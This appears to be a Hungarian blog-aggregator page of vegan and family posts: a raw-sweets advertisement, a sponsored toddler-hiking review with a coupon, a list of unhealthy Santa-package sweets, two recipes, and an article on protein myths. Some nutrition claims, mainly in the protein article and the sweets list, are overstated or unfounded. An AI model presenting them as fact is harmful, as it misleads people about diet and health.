Visszatértek a Karácsonyi Sületlenségek! A növényi alapanyagokból, kíméletes eljárással készülő kézműves termékeink cukor- és gluténmentesek. Igazi tápanyagforrást jelentenek! Visszatért a Nyers vegán diós beigli és a Mákos beigli, amit 150g-os és 300g-os rúdban rendelhettek meg. Idén a már klasszikusnak számító Citromos- mákos ízű nyers vegán szaloncukor mellett új ízekkel szeretnék vásárlóinkat kényeztetni: Tonkababbal ízesített nyers csokoládés narancssárga gyümölcslapba bújtatva és Kardamonos- narancshéjas lila lapba bújtatva. Ezeket az új finomságokat hazai termesztésű, magas minőségű sztíviával édesítjük, így cukorbetegek és diétázók számára is fogyaszthatóak. Szaloncukorjaink darabonként, illetve 3-as és 9 darabos csomagolásban is rendelhetőek. Nyers bonbonjaink kiváló minőségű alapanyagokból készülnek, melyek szinte kizárólag ökológiai gazdálkodásból származnak, illetve vegyszermentes hazai forrásokból így csökkenteve ökológiai lábnyomunkat is. A kísérletező műhelymunka különleges ízvilágot és egyedülálló kompozíciókat eredményez. Fontos szempont számunkra, hogy az édességek ne csak a nassolás szerepét töltsék be, hanem értékes tápanyagokkal szolgáljanak szervezetünk számára. Így ezek nem csak kémyeztető de hasznos ajándékok is lehetnek egyben. Ajánljuk az Ünnepekre is! Kiváló ajándék barátaink, családtagjaink és kollégáink, üzleti partnereink részére is. Rendelhető 6,9 vagy 12 darabos Édességválogatásként! Új termék a nyers karobos csíráztatott mandula vaj , ami 200 ml-es üvegben kapható. Ezzel a finomsággal is szeretnénk édesebbé tenni az Ünnepeket. A csíráztatott vegyszermentes magyar mandulából készült vajat bio nyers karobporral és bio kókuszvirág cukorral ízesítjük, hogy a gyerekek is fogyaszthassák így elkerülve a kakaó élénkítő hatását. A karobpor, mely egyebek mellett B-, A- vitaminban és kalciumban is gazdag finom édes íze a mandula vajjal keverve páratlan kencét eredményez. Szívből ajánljuk mindenkinek!
Túrázás az Őrségben kisbabával + SkipHop kedvezménykupon
2014. november 28. Zizi kalandjai
Már az elején le kell szögeznem, hogy a legcukibb dolog a világon, ha a másfél évesünk hátára egy mini hátizsákot teszünk és nézzük, ahogy boldogan szaladgál a saját táskájával és a benne lévő kincseivel. Nem vagyunk nagy túrázós család (szeretnénk majd azok lenni), de azért évente minimum egyszer elmegyünk egy néhány napos kirándulásra Magyarországon. A túrákat egy gimis osztálytársam – Zoli és felesége, Marcsi – szervezik és az idén egy elég nagy csapat jött össze. Voltak rajtunk kívül még kisbabások, gyerekesek, de Ádi volt a legifjabb a lurkók közül. Tavaly is túráztunk, igaz akkor majdnem fél évesen csak kisebb sétákat tett velem a hordozóban. Idén azonban megpróbáltuk a túrázást, meg is tettünk három 8-10 km-es utat az Őrségben bolyongva és a Somlóhegy környékén. Kicsit izgultunk az elején, de a második napon egész jól belejöttünk a túrahordozásba (mi egy ilyen hordozót kaptunk kölcsön, de egy másik családnak ilyen volt, ez is szuperül funkcionál). Ez azért kicsit nehezebb alapsúllyal indul, mint egy normál hordozó, de beleültetve a babát is egészen elviselhető a súlya… első alkalommal én voltam a bátor, aki bevállalta a “cipekedést”, a többi alkalommal pedig apa volt a hős. Jó, ha izgalmas környékre megy az ember, mármint egy-két nevezetesség megtekintése után, beiktatunk olyat is a túrába, ami a babának is érdekes. Ilyen volt az első napunk, amikor a veleméri templomtól indulva Magyarszombatfáig kirándultunk és az út során nagyon sok állattal találkoztunk (tehén, kecske, kakas, tyúk, kutya, macska, bárány – mind szabadon legelésztek vagy rohangáltak) és a túra végén még a szaknyéri alpaka farmot is meglátogattuk (ami nemcsak a gyerekeknek, hanem a felnőtteknek is nagy élmény volt). Ádi egész jól bírta a hordozóban ücsörgést – főleg, ha volt mit néznie vagy a többi túrázó szórakoztatta -, még enni és aludni is tudott és persze voltak olyan szakaszok, ahol kivettük a hordozóból és hagytuk, hagy szaladgáljon/sétáljon egyedül. Így megtartottuk az egyensúlyt a hordozás és az önálló mozgás között. Nagyon élvezte, hogy neki is van saját hátizsákja, mint a szülőknek és a többi túrázónak. Egy cuki majmos, amibe belepakolt apróságokat, amelyek a túrához nagyon fontosak voltak persze. Ez egy ugyanolyan táska, mint az uzsonnás változat, csak a belsejében nincsen hőszigetelés, hátra vehető és tartozik hozzá egy “póráz” (amely le is kapcsolható). Kipróbáltuk mi is, de ezt igazából olyan környezetben tartom fontosnak, ahol nagy a tömeg, így biztosan a közelünkben tudhatjuk a gyermeket. Tágas, egyterű rekeszében elhelyezhető az uzsonna vagy egy kis palack innivaló vagy a legfontosabb apró játékok. Külső oldalain az apró hálós rekeszekbe is lehet pakolni. Kézben is fogható vagy felakasztható a felső fülének köszönhetően. Többféle színben és állat figurában kapható, itt találjátok meg mindegyiket. A termék elnyerte tetszésünket, most már szinte mindig magunkkal visszük “városi túrázásokhoz” is. Szuper jó dolog friss levegőt szívni és a természet csodáját megmutatni a kisbabánknak. Mindenkinek ajánlom, hogy lehetőségeihez mérten évente iktasson be néhány magyarországi túrát a családi programba. Az Őrség és környéke magával ragadó, az ott élő emberek nagyon kedvesek és vendégszeretőek. Az Őrség Vendégház Őrimagyarósdon példaértékű, a tulajdonosok, Vilmos és Csilla mindent megtettek, hogy a csoportunk jól érezze magát… értem ezalatt a bababarát szállást, a vegán étkezés lehetőségét, a sok mosolyt és kedvességet, amit tőlük és kollégáiktól kaptunk. A Skip*Hop elérhető az alábbi linkeken: - weboldal - Facebook oldal Skip*Hop Magyarország és Monkie A hátizsákot a {Monkie} biztosította a teszteléshez. A véleményem csakis a sajátom. ***** KEDVEZMÉNYES VÁSÁRLÁSI LEHETŐSÉG A ZIZI KALANDJAI OLVASÓINAK!!! Aki 2014. november 28 és 2014. december 5-e között vásárol Skip Hop, Yeominis, Stor it vagy Frank&Fischer márkájú termékeket a Monkie oldaláról (kivéve Baghera, Duux, 4moms termékek illetve a társasjátékok és más kedvezménnyel nem összevonható) az 10% kedvezményben részesül (a végösszegből kerül levonásra). A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZIKU10. Jó vásárlást mindenkinek!
Egészségre ártalmas mikuláscsomagok, avagy a 10 legveszélyesebb élelmiszer, ami a csomagokba kerülhet
2014. november 27. Éltető ételek
Van zsákodban minden jó, piros alma, mogyoró... Biztos mindenki ismeri ezt a kedves kis dalt. December 6-át megelőző este gyerekek milliói tisztogatják csizmájukat abban a reményben, hogy finomabbnál finomabb meglepetést kapjanak. Na de mi kerüljön a mikuláscsomagba? Jobban mondva, mi ne kerüljön? Összegyűjtöm azt a 10 immunromboló, egészségre ártalmas ajándékot, ami biztos nem kerül bele a gyerekeim csizmájába. Persze lehetne még sorolni, és nem megállni a tíznél, de remélem, hogy amennyiben elolvasod ezt a blogot, akkor látni fogod az alapelveket. Előljáróban minden olyan édesség kizárva, amelynek a fő összetevője cukor. Ezenkívül a hidrogénezett növényi zsiradék is kizárt, valamint az E-számokkal tűzdelt leírás. Azokat veszem sorba, amik mindig bekerülnek a gyerekeim óvodás csomagjaiba. Sajnos ezek a többnyire a kukában landolnak, miután a gyerekekkel közösen áttanulmányoztuk az összetevőket. Még a szegény gyerekeknek sem szívesen adom oda, hiszen ha az én gyerekeim egészségét károsítja, akkor a szegény gyerekekét is. Én meg azt nem szeretném... Valamint a mértéktelen csokoládé- és cukorfogyasztástól a gyerekek túlpörögnek és székrekedést kaphatnak, ezért is érdemes legalább a Mikulás-csomag egy részét az édességeknél tápanyagban gazdagabb élelmiszerekkel kiváltani. 1. Csokimikulások Nem minden csoki, ami annak látszik. Nézzük meg a mikulások talpára ragasztott leírást, amely alapján könnyűszerrel megállapíthatjuk, hogy a kosarunkba kerüljön-e vagy sem. Elsősorban azokra a csokoládékra gondolok, amelyeknek a kakaós tejbevonó massza, a hidrogénezett növényi zsíradék valamint a cukor a fő összetevője. Ugyanakkor ne dőljünk be a méretüknek sem, hatalmas csokimikulások kaphatók pár száz forintért. Nos, ezek biztos, hogy nem a gyerekek csomagjába valók! Sőt, még fokozzák mindezeket azzal, hogy a mikulás üregébe helyeznek különféle cukros drazsékat, pelyheket . Viszont nehogy úgy járjatok, mint ahogy a mellékelt képen látható. Mikulás csomagolásba húsvéti nyuszi volt. Úgy látszik, kimaradtak a tavaszi nyuszik, és azt becsomagolták karácsonyra. No comment... Törekedjünk arra, hogy étcsokit válasszunk, kapható olyan csokoládé is, melyek 60-70% kakaóvaj tartalommal rendelkeznek. Mindenesetre az első helyen a kakaóvaj álljon, akkor nagy hibát nem követünk el. 2. Szaloncukor Itt is találunk jó és kevésbé jó, valamint kifejezetten ártalmas szaloncukrokat. Zselés, marcipános eleve kizárva. Csak példaként kiragadva, ez egy magyar, nagyhírű csokoládégyár zselés szaloncukor jának az összetevője: "cukor, glükóz szirup, kakaós étbevonó massza 20% [cukor, növényi zsír, zsírszegény kakaópor (10%), emulgeálószer (szójalecitin), aromák (csokoládé- vanília)], étkezési sav (citromsav), zselésítő anyag (pektin), aromák (citrom, málna), színezék (E120)" Valamint ne dőljünk be az ÍZŰ elnevezéseknek sem, mert ezek egyáltalán nem tartalmazzák a valódi gyümölcsöt, csupán azok aromáját. Erre is egy példát hozok. Császárkörte ízű szaloncukor narancshéjdarabokkal : Fondan (cukor, glükóz szirup, víz), kakaós étbevonó massza (cukor, növényi zsír, zsírszegény kakaópor (16% emulgeálószer (szójalecitin), természetazonos aromák (csokoládé- vanília ízű), tejfehérje, hidrogénezett növényi zsír, szójaliszt, narancshéjdarabok, zsírszegény kakaópor, nedvesítőszer (szorbit), természetazonos aromák (császárkörte, narancsolaj aroma), étkezési sav (citromsav), emulgeálószer (szójalecitin), tartósítószer (kálium- szorbát), étkezési só, stabilizátor (invertáz) Na, ez hogy tetszik? Törekedjünk aszalt gyümölcsös, valódi kakaóvajas szaloncukrot vásárolni. Kaphatók kézműves szaloncukrok, de ebben az esetben is nézzük meg az összetevőket! 3. Gumicukor A fő összetevője állati eredetű zselatin, ami főleg a kötőszövetből készült. Ezenkívül rengeteg adalékanyagot tartalmaz, hiszen a színezéshez, az ízesítéshez, és a tartósításhoz is szintetikus szereket használnak fel, tehát a gumicukor valójában műanyag, ami egyáltalán nem egészséges. 4. Cukorkák Szerintem ez egyértelmű, de ne gondoljuk azt, hogyha vitaminnal dúsított, akkor milyen szuper. Nos, NEM. Sajnos ezek szintetikus vitaminok, melyek fokozzák a cukor káros hatásait. Egyébként minden anyukának, nagymamának, óvonőnek, tanárnőnek, élelmezésvezetőnek kötelezővé tenném a Cukor blues című könyv elolvasását! 5. Kinder tejszelet Nos, itt is van 1-2 varázsszó. Egyrész a kinder ugye gyereket jelent, tehát kifejezetten nekik készítette a gyártó. Valamint a méz és a tej is egy fontos varázsszó. Hű de jó, akkor ez egészséges. Nos, NEM. Valójában 57%-ban zsírból és cukorból áll. Pontos összetevője: pasztőrözött tej 40%, növényi zsír és olaj, cukor, búzaliszt, sovány tejpor, méz 5%, dehidratált vaj, tojáspor, sovány kakaópor, finom korpa, térfogatnövelő szerek (dinátrium-difoszfát, nátrium-hidrogén-karbonát, ammónium-karbonát), emulgeálószer (zsírsavak mono- és digliceridjei), aromák, étkezési só. Ha figyelmesen megnézzük, csupán 5 % mézet tartalmaz, ugyanakkor sokkal-sokkal több cukrot. Egy tejszelet nettó tömege 28 gramm, amelyben 2,5 kockacukornak megfelelő cukor található. 6. Kinder csokoládé Mit mond a gyártó? Több tej, kevesebb kakaó: az egyenként csomagolt tejes töltésű tejcsokoládé szeletek a gyerekek igényeinek figyelembevételével készülnek, kifejezetten gyerekméretben. Na de nézzük meg az összetevőjét is: tejcsokoládé 40% (cukor, teljes tejpor, kakaóvaj, kakaómassza, emulgeálószer: lecitinek (szója); vanillin), cukor, sovány tejpor (18%), pálmaolaj*, dehidratált vaj, emulgeálószer: lecitinek (szója); vanillin. Kakaószárazanyag-tartalom a tejcsokoládéban: legalább 30%. Összes tejszárazanyag: 33% - Összes kakaó összetevő: 13% Mielőtt még bármit is írnék, azt tudni kell, hogy mit tartalmaz egy jó csokoládé: kakaóvaj, kakaópor, természetes édesítő, pl. nádcukor). Mivel ez tejes, így tejport is tartalmaz. Szerintem az összetevőket megvizsgálva, mindenki döntse el maga, hogy bekerül-e a mikuláscsomagba ez a desszert. 7. Maoam Nos, én ezt még sosem kóstoltam, de a pénztárnál várakozva a gyerekek mindig ezzel nyaggatnak. Mindenesetre a csomagolás szuperül a gyümölcsökre épít (többek között cseresznyés epres, málnás, savanyú almás, lime, cólás ízben kaphatók), mintha telis tele lenne értékes, természetes vitaminokkal. A neten böngészve jövök rá, hogy ez nem más, mint olvadós rágó. És még dobozos kiszerelésben is kapható. Hűűű. Pontos összetevőt nem találtam, viszont a tápérték vizsgálata alapján 57%-a cukor! Ne haragudjatok, de ez KUKA!!!! 8. Nyalóka Hát, ez a halálom. Jó sokáig áznak azok a drága tejfogacskák a cukorszirupban, nincs ennél rosszabb. Biztos többen emlékeztek Kojak-re, a híres nyomozóra. Mindig a szájában lógott ez a cukorka. Bár kézműves nyalókák is kaphatók, de minden esetben a fő összetevője a cukor. Ezt találtam egy blog oldalán: Szörpös nyalóka hozzávalói: 1 pohár cukor (1,5 decis), fél pohár víz, negyed pohár (kb. 2 evőkanál) glükózszirup, 1 evőkanál sűrű szörp vagy 2 evőkanál rostos gyümölcslé. Nos, ha ilyen receptek vannak az oldalán, akkor gondolom, a vásárolható nyalókái is hasonló alapanyagokból készülnek. 9. Cukormentes rágóka Ezt olvasva, biztos sokan megörülnek, hogy VÉGRE! cukomenntes rágó. Na akkor most nézzük is meg, ha nem a cukortól édes, akkor mitől? Hát a töménytelen mesterséges édesítőktől . És bizony ez sem jobb, mint a finomított kristálycukor. Nézzünk ennek is egy összetevő listát: szorbit, izomalt, mannit, aszpartám, aszpartám-aceszulfám só, aceszulfám K, Gumi alapanyag (szójalecitint tartalmaz), Aromák, Fényező anyag: kalcium-karbonát, Nedvesítőszer: glicerin, Sűrítő anyag: gumiarábikum, Színezék: E171, Fényező anyag: karnaubaviasz, Antioxidáns: BHA Szerintetek szüksége van ezekre egy fejlődő szervezetnek? Szerintem nem. 10. Sóspálcika (ropi) Ezekből is lehet kapni jót és kevésbé jót. Egy átlagos ropi összetevői: búzaliszt, sütőmargalin (növényi olajok és zsírok, ivóvíz emulgeálószer: zsírsavak mono és trigliceridjei, étkezési só, savanyúságot szabályozó anyag: citromsav, színezék: béta-karotin, aromák), finomított napraforgó étolaj, kristálycukor, élesztő, konyhasó (2%), tej, ivóvíz, savanyúságot szabályozó anyag: nátrium-hidroxid. Nos, kezdem azzal, hogy a finomított lisztből készült ételeket érdemes kerülni. Ugyanis ezek a bélben csirízként szépen összeragadnak, és összetapasztják a bélbolyhokat. Ezzel az értékes tápanyagok felszívódását gátoljuk. Valamint tudjátok, hogy hogyan készül a finomított étolaj? Nos, ezt olvasd el. Ezek után döntsd el, hogy megvásárolod-e. Persze ne csapjanak be a jól hangzó szavak, hogy Tönkölybúzás sóspálcika. Ebben az esetben is fordítsuk meg a csomagolást. Ez az egyszerű ropi jócskán tartalmaz összetevőket: tönkölybúzaliszt (34,5%), teljeskiőrlésű búzaliszt (34,5%), ivóvíz, növényi zsír, kristálycukor, étkezési só (min. 2%), élesztő, tejsavópor, fényező anyag (nátrium-hidroxid), lisztjavító szer (búzamalátaliszt, emulgeálószer: zsírsavak mono- és digliceridjeinek mono- és diacetil bórkősav észterei; szójaliszt, emulgeálószer: zsírsavak mono- és digliceridjei, étkezési só, lisztkezelőszer: aszkorbinsav, enzimek: amilázok) 10+1 Virgács Szerintem ne a mikuláscsomagba tett virgáccsal akarjuk fegyelmezni gyerekeinket, és kiemelni, hogy te rossz vagy. Én sose teszek virgácsot a csomagba. Összességében azt javaslom, hogy MINDEN ESETBEN olvasd el az összetevőket. Ez alapján el tudod dönteni, hogy az a finomság, amit a gyerekednek szeretnél adni, megvásárold-e. Ezek után felmerül a kérdés, hogy akkor mit is tegyünk a mikuláscsomagba, hogy a gyerkőc örüljön neki, és mi felnőttek, lelkiismeretfurdalás nélkül adjuk. Nos, a következő írásomban tippeket adok erre is. Felhasznált irodalom: http://tudatosvasarlo.hu/cikk/kinder-tejszelet-dietetikus-szemmel http://www.sarospatakhungaria.hu/szaloncukor/csaszarkorte+izu+szaloncukor+narancshejdarabokkal.html http://www.ferrero.hu/csokolade/ http://kezmuvesnyaloka.blogspot.hu/ http://www.origo.hu/tafelspicc/teszt/20140924-ropi-sos-palcika-teszt.html?pIdx=1
Mosolygós Cukkinis tócsni :-)
2014. november 23. Zöld Avocado
Elnézést kérek mindenkitől, aki már alig várta az újabb zöldséges receptet a blogon, de az elmúlt egy hét olyan gyorsan eltelt, mintha egy szempillantás lett volna. Biztosan veletek is sokszor megesik, hogy a tennivalók listája állandóan a "majd holnap elintézem" kategóriába kerül... de az a holnap, csak nem akar eljönni. ;-) Igyekszem a következő pár napban kárpótolni titeket jobbnál jobb, finomabbnál finomabb , szebbnél szebb, egészségesebbnél egészségesebb... -na nem ragozom tovább - receptekkel. :-) mosolygós cukkinis tócsni Most egy újraértelmezett magyar ételt hoztam nektek, amit alapvetően burgonyával készítenek, de ezesetben egy értékes, sokoldalú és olcsó zöldségünk, a cukkini lesz az alapanyag. Az eredeti receptet mindenki más néven ismeri. Hallottam már ezt a krumplilepényt lepcsánkának, tócsninak, tócsinak, berétnek pacsninak és cicegének is elnevezni. Ki milyen névvel illeti ezt a gyors és egyszerű magyar ételt otthon? Habár a cukkini valójában a nyár nagy slágere, azért télen is bőven találunk belőlük a boltokban, vagy akár a fagyasztónkban korábbról eltéve. Mi télen nyáron fogyasztjuk ezt a magas víz-, de alacsony kalória tartalmú, lúgosításra is kíválóan alkalmas, C- és egyéb vitaminokban gazdag tökfélét. A cukkini héja béta karotint tartalmaz, tele van antioxidánsokkal, segít megelőzni a sejtek károsodását. Mivel ez a zöldségféle magnéziumot és foszfort is megfelelő mennyiségben juttat szervezetünkbe, ezért ez is egy lehetőség a tej mellett, vagy a tej helyett, hogy segítséget kapjunk a csontok felépítésében és megtartásában. Az újraértelmezett és sokkal egészségesebb (szerintünk finomabb is) változatot ugyanúgy időigényes elkészíteni, mint elődjét, de megéri a kedvenc sorozatunk közben a tűzhely mellett állni, és sütögetni ezeket a mennyei cukkinis plecsniket. :-) Cukkinik HOZZÁVALÓK: - 1 közepes méretű cukkini alaposan megmosva - 10 dk intenzív ízű reszelt sajt (ez lehet füstölt, vagy parmezán, de akár ementáli is) - 3-4 ek szezámmag - 2-3 ek kukoricaliszt / vagy kukoricadara - 1 marék friss petrezselyem - 1 dl víz - Himalája só - őrölt fehérbors - kókuszzsír vagy extra szűz olíva olaj vagy repce olaj Cukkini feldolgozásra várva ELKÉSZÍTÉS: A cukkinit miután alaposan megmostuk, reszeljük le a héjával együtt a nagy lyukú reszelőn. Egy másik tálban keverjün sűrű masszát a sóval, borssal, vízzel, és a kukorica liszttel. Keverjük hozzá a lereszelt cukkinihez, majd adjuk hozzá a szezámmagot. a reszelt sajtot és a friss apróra vágott petrezselymet is. Egy teflon serpenyőbe tegyünk egy kis zsiradékot, hevítsük fel, majd kezdjük el a lepénykéket sütni, mint a palacsintákat, csak kisebb, tenyérnyi méretben. Egy-egy merőkanállal egy-egy lepénykét kapunk, melyeknek mindkét oldalukat pirosra kell sütni. (Egy nagy lapát szerű eszköz nagy hasznunkra lehet a forgatásnál.) Pótoljuk közben a zsiradékot, ha szükséges. Illetve ha úgy érezzük, hogy a cukkini túl vízes volt, tegyünk a masszához még kukoricalisztet. Vagy ha ellenkezőleg, túl sűrű a massza, akkor keverjünk még hozzá vízet. Próbáljuk meg eltalálni azt a tökéletes állagot, ami könnyedén ínycsiklandóan pirosra sül a serpenyőnkben. ;-) A tetején sima tejföllel, fokhagymás tejföllel, vagy natúr joghurttal tálalva mindenkit hamar mosolygóssá tehetünk. :-) mosolygós cukkinis tócsni Örömteli, gyomorbarát, egészséges étkezést kívánok! :-)
Vegán (édes)burgonyás pogácsa
2014. november 16. Zizi kalandjai
Ma délután babatalálkozós édesburgonya (batáta) partira voltunk hivatalosak a barátainkhoz… hogy miért pont édesburgonya a parti témája, annak hosszú története van, de a lényeg, hogy sikerült végre magyar, ásotthalmi édesburgonyát vennem. Valójában ez egy burgonyás pogácsa, csak tettem hozzá egy darab édesburgonyát is, ami szépen megszínezte sárgára (igen, a szín nem tojástól van). Természetesen elkészíthető csak burgonyából is, nem kötelező édesburgonyát tenni bele. Még soha nem sütöttem vegán pogácsát, de úgy érzem, hogy első alkalomnak kiváló volt ez az indulás. Mindig idegenkedtem a “margarin” használatától, de aztán rájöttem, hogy most már vannak igen jó minőségű margarinok – erről beszél Tóth Gábor élelmiszeripari mérnök is ebben a cikkben -, plusz vannak olyanok, akik laktózérzékenységük miatt bármennyire is szeretnék, nem fogyaszthatnak vajat. Egyébként ebbe a pogácsába csak egy kevés bio margarin (nem génkezelt alapanyagokból készült, nem hidrogénezett!) került, mert nem volt itthon több, a maradék zsiradékot puha kókuszzsírral váltottam ki. Finom, puha pogácsákat kapunk végeredményül, amely a háromszori hajtogatásnak köszönhető. Szóval idő mire elkészül a pogácsa, viszont nagy munkát nem igényel, és a végeredmény magáért fog beszélni. Ádi is rájárt, bár ő inkább kikapott egyet, harapott belőle, visszarakta, majd kivett egy másikat, abból is harapott egy falatkát… Vegán (édes)burgonyás pogácsa Hozzávalók: - 500 g burgonya + édesburgonya (egy közepes darab), meghámozva, felkockázva - 500 g simaliszt - 250 g jó minőségű margarin / kókuszzsír, szobahőmérsékletű - 1 tasak (7-9 g) szárított élesztő - 125 ml langyos rizstej + egy kevés a kenéshez - só Tegyük egy lábasba a burgonyát + édesburgonyát, öntsük fel vízzel és főzzük puhára. Szűrjük le, majd törjük pépesre burgonyatörővel. Öntsük egy bögrébe a langyos rizstejet, adjuk hozzá az élesztőt, keverjük el és hagyjuk felfutni 4-5 perc alatt. Tegyük egy tálba az összetört burgonyát, adjuk hozzá a lisztet, a puha margarint/kókuszzsírt, a felfutott élesztőt, majd sózzuk ízlés szerint. Gyúrjuk össze a tésztát, majd takarjuk le egy konyharuhával és hagyjuk 45 percet kelni. Lisztezett deszkán nyújtsuk ki fél centiméter vastagra, majd a négy oldalát középre hajtva hajtogassuk össze. Tegyük rá a konyharuhát és hagyjuk kelni 15-20 percet. Nyújtsuk ki, majd megint hajtogassuk össze… ezt ismételjük összesen még kétszer. Az utolsó nyújtásnál szintén fél centiméter vastagra hagyjuk a tésztát, késsel rácsozzuk be a tetejét. Szaggassunk pogácsákat belőle, tegyük sütőpapírral bélelt tepsire és kenjük meg a tetejüket rizstejjel. Süssük 180C fokon kb. 20 percig, amíg aranybarnák lesznek.
Fehérje bevitel. Egy tévhit, ami évente 70 milliárd állat életébe kerül!
2014. november 14. Vegan Spirit
Évente ugyanis ennyi állatot mászárolnak le. Ennek pedig fő oka a megszokáson kívül az, hogy a fehérjebevitellel kapcsolatban erős félelem és tévhit lakozik az emberek többségének a tudatában. Az igaz, hogy többféle hiánybetegség jelentkezhet egy vegán embernél, (akár csak egy mindenevőnél) ha rosszul étkezik, de fehérjehiányos vegánnal még nem találkoztam, nem is olvastam ilyenről, és nem is halottam példát, hogy más találkozott volna ilyennel. Pedig évek óta bújom a netet pro és kontra a témában. Tehát gyakorlatilag fehérjehiányosan táplálkozni majdhogynem lehetetlen! Az egész fehérjebevitel köré épült félelem és félretájékoztatás, miszerint a növényi fehérjék nem teljes értékűek, és komplettálásra szorulnak, Frances Moore Lappé: Diet for a Small Planet című 1971-es könyvéből ered. Ő volt az, aki felvetette ezt, azonban a 10 évvel későbbi, 1981-es könyvének kiadásakor megcáfolta korábbi felvetéseit, felismerve, hogy azok tévesek volta, és túlgondolta azt. Ez a téveszme már több mint 40 éve él, áldozatai pedig állatok tízmilliárdjai évente, és milliónyi ember, aki rákos lesz a magas állati fehérje bevitel miatt. Ráadásul annak ellenére, hogy már maga a szerzője is megcáfolta, csak nem akar megszűnni mégsem... A legnagyobb tévhit általában a növényi táplálékok létfontosságú (vagy esszenciális) aminosav összetételével kapcsolatban van. Gyakorta azt szoktuk hallani, mind vegyes táplálkozásúaktól, mind vegánoktól, hogy a növényi táplálékok hiányosak bizonyos létfontosságú aminosavakban, például a hüvelyesek metioninban vagy a gabonák lizinben, emiatt pedig "komplettálni" (kiegészíteni/keverni) kell ezeket, hogy hozzájussunk az összes létfontosságú aminosavhoz. Magával a "hiányos" szóval, azt sugallják nekünk, hogy abból a táplálékból teljes mértékben hiányzik, vagy nem található meg benne megfelelő mennyiségben, és hiába is fogyasztanánk el elegendő mennyiségű kalóriát belőle, képtelenek lennénk fedezni azt az adott aminosavat - és itt van a probléma, hiszen ez nem igaz. Minden nem ember által "előállított" táplálék, mind tartalmaz fehérjét, mind tartalmazza az összes létfontosságú aminosavat. Egyik ételcsoport (gyümölcsök, zöldségek, hüvelyesek, gabonák - még a finomított gabonák, mint fehér rizs, fehér kenyér vagy fehér tészta -, diófélék, olajos magok és gombák) sem hiányos semelyik létfontosságú aminosavban. Csupán a többi aminosavhoz viszonyítva, arányaiban kevesebb fordulhat elő egyes aminosavakból, egyes táplálékokban, azonban ha elég táplálékot veszünk magunkhoz (magyarul elég kalóriát fogyasztunk és nem éheztetjük magunkat), akkor akár egyetlen táplálékból is - néhány ritka kivételtől eltekintve - fedezhetnénk a létfontosságú aminosav szükségletünket (értsd, például csak rizst, burgonyát, babot, kivit, ribizlit, paradicsomot, brokkolit, salátát stb., magában fogyasztva, bármiféle más táplálék hozzáadása nélkül). Erről bárki meggyőződhet maga is, bármilyen étrendi napló segítségével (pl.: http://cronometer.com ), melyek mind az USDA adatbázisára épülnek, amik képesek kilistázni az egyes táplálékok aminosav-mennyiségét. Így a felvetés, miszerint, aki csak (akár csak egyetlen féle) növényi táplálékot fogyaszt "másodrangú/hiányos" fehérjét fogyaszt, teljességgel alaptalan. A másik gyakori tévedés pedig a fehérje mennyiségét illetően szokott felmerülni, amiről azt gondolják az emberek, hogy abból rengetegre van szükségük, legfőképpen, ha komoly fizikai munkát végeznek. Itt érdemes feltenni a kérdést, hogy az elfogyasztott fehérjét mire is használja a szervezetünk. Két dologra használhatja: karbantartásra és energiaellátásra. A karbantartás része a dolognak az, amiért az embereknek fehérjét (és vele együtt létfontosságú aminosavakat) kellene fogyasztaniuk, amiből a szükséges mennyiség azonban rendkívül alacsony. Dr. William Rose 1949-ben adta közzé elsőként (infó ITT) az ember fehérje- és létfontosságú aminosav szükségletét, amiben 20 grammnyi (a nitrogénegyensúly fenntartására elegendő) fehérjeminimumot állapított meg (a hagyományos testépítőkénél nagyságrendekkel kevesebb fehérjét fogyasztó, de izomépítésre mégis képes nyers gyümölcsevőket, lásd ITT), és a jelenlegi ajánlásoknál szintén alacsonyabb szükségletet talált a létfontosságú aminosavakból is (noha a hivatalos ajánlásokban szereplő 0,66g-0,83g/testtömeg kilogrammnyi fehérje - ami bizonyos biztonsági ráhagyást tartalmaz - is könnyűszerrel fedezhető). Ennél a mennyiségnél kevesebb fehérjét, és a meghatározott létfontosságú aminosavak mennyiségénél kevesebbet fogyasztani - teljes értékű, fehérjét tartalmazó, növényi táplálékokból, néhány ritka kivételtől eltekintve - csak kalóriahiánnyal egybekötve (szándékos éheztetéssel, valós éhezéssel - lásd fehérjehiánytól, és egyéb hiányoktól is szenvedő, éhező afrikaiak - vagy teljes táplálékmegvonással, mint például böjtöléssel) lehet. Ezenkívül az emberekben az maradt meg valahonnan, hogy a fehérje egy jó energiaforrás, holott az a cukor, amelyből már az étkezés során egy adag a nyelvünk alól felszívódik a véráramba, és azonnali energiát biztosít, ellentétben ezzel a fehérje (akárcsak a zsír) nagyon lassan emésztődik a gyomorban, melynek során a szervezetünk az elfogyasztott fehérjét aminosavakra bontja, majd azok 65-85%-át glükózzá alakítja (egy folyamat révén, melynek neve glükoneogenezis), mert az önmagában használhatatlan energiaforrásként. Ezért az olyan emberek, akik túl sok fehérjét fogyasztanak (mint például a testépítők), folyamatosan arra kényszerítik a szervezetüket, hogy a lassan emésztődő és későbbiekben még glükózzá is átalakítani szükséges fehérjéből (aminosavakból) fedezzék az energiaszükségletüket, ahelyett, hogy azt könnyedén felhasználható szénhidrátból tennék. Az imént leírtakból világosan látszódik, hogy, energiaellátásra egyáltalán nem is tanácsos fehérjét fogyasztanunk. Még karbantartásra sem ajánlott a túlzott fehérjebevitel, hiszen következtében a szervezetünkben felhalmozódhat az ammónia, mely izomfáradtságot okozva pontosan azt váltja ki, amit minden bizonnyal el szerettünk volna kerülni. Aki további olvasnivalóra vágyik a témában, annak ajánlom a következő angol nyelvű oldalakat: http://michaelbluejay.com/veg/protein.html https://www.drmcdougall.com/misc/2007nl/apr/protein.htm http://www.nealhendrickson.com/mcdougall/031200puprotein.htm írta: GS
Mák jótékony hatásai
2014. november 9. Éltető ételek
